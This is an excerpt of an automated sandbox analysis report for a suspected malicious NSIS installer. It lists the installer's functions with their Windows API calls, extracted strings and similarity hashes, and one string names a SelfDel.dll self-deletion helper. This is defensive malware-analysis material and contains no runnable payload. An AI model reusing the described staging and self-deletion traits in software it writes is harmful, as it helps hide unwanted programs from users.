DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

RichEdit20W, xrefs: 00403E75, 00403E7B
RichEd32, xrefs: 00403E65
RichEdit, xrefs: 00403E84
1033, xrefs: 00403C49, 00403CA5
Del, xrefs: 00403CF1, 00403CFA, 00403D08, 00403D29, 00403D47, 00403D57, 00403D5D
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
.exe, xrefs: 00403D37
RichEd20, xrefs: 00403E57
.DEFAULT\Control Panel\International, xrefs: 00403C95
_Nb, xrefs: 00403DAD, 00403E15
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2E

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Del$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-2615572121
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Function 00403082 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4hIPvzV6a2.exe,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4hIPvzV6a2.exe,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

soft, xrefs: 00403170
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
C:\Users\user\Desktop\4hIPvzV6a2.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
Error launching installer, xrefs: 004030D2
Null, xrefs: 00403179
Inst, xrefs: 00403167
C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\4hIPvzV6a2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3459854519
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

... %d%%, xrefs: 00403400
A, xrefs: 00403379
*B, xrefs: 004032E4
>B, xrefs: 004033A7, 004033C2, 0040343F
A, xrefs: 00403483

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ >B$ A$ A$... %d%%
API String ID: 551687249-3801301222
Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Del,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,Del,Del,00000000,00000000,Del,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,00423E20,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 00401826, 00401844
Del, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 004017A3
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll, xrefs: 0040183A, 00401856

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp$C:\Users\user\AppData\Local\Temp\nsv4B6.tmp$C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll$Del
API String ID: 1941528284-2734193482
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp
API String ID: 2655323295-2998130390
Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58

Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97

Strings

C:\, xrefs: 00405F34, 00405F39, 00405F3F, 00405F80, 00405F86, 00405F8E, 00405F96
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3049482934
Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040607B
nsa, xrefs: 00406083

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp
API String ID: 1892508949-2998130390
Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00423E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,00423E20,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalFree.KERNEL32(0080F230), ref: 00401C10
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22

Strings

Del, xrefs: 00401BC7, 00401BCD, 00401BE7

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Global$AllocFree
String ID: Del
API String ID: 3394109436-3562819231
Opcode ID: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
Instruction ID: 52bd34c5afe528d1e7f7705a0b64ffdd7bdb14472fd10e075fda9825736fe234
Opcode Fuzzy Hash: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
Instruction Fuzzy Hash: B221F972900254E7D720BF98DD89E5E73B5AB04718711093FF552B76C0D7B8AC019B9D

Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4B6.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 83fa7e78d7cc85db6417fd9f9f7c0855fa471106849bec38802f500a3fbec511
Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
Opcode Fuzzy Hash: 83fa7e78d7cc85db6417fd9f9f7c0855fa471106849bec38802f500a3fbec511
Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D

Function 00405C1B Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00406022: GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
Part of subcall function 00406022: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040603B

